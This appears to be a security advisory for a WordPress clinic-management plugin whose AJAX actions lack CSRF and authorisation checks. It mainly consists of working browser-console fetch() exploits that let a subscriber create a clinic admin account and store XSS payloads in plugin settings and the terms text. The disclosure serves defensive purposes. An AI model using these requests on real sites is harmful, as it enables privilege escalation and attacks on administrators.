The plugin does not have proper CSRF and authorisation checks in various AJAX actions, allowing any authenticated users, such as subscriber to call them. Attacks include but are not limited to: Add arbitrary Clinic Admin/Doctors/etc and update plugin’s settings
Run one of the below commands in the developer console of the web browser while being on the blog as subscriber user.
To add a clinic admin:
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'action=ajax_post&route_name=setup_clinic_admin&first_name=Attacker&last_name=Attacker&[email protected]&mobile_number=11&gender=other',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
Then login with the username and credentials sent to the [email protected] email address
To update the Recaptcha settings (with an XSS payload)
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'action=ajax_post&route_name=save_google_recaptcha_setting&status=on&site_key=<svg onload=alert(`XSS-site-key`)>&secret_key=<svg onload=alert(`XSS-secret-key`)>',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
The XSS will be triggered when an admin open https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_all_general_setting
To update the term and conditions message with an XSS payload:
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'action=ajax_post&route_name=terms_condition_save&isVisible=1&content="><svg onload=alert(`XSS`)>"',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
Then the XSS will be triggered when accessing https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=terms_condition_list (there might be other location the payload is triggered)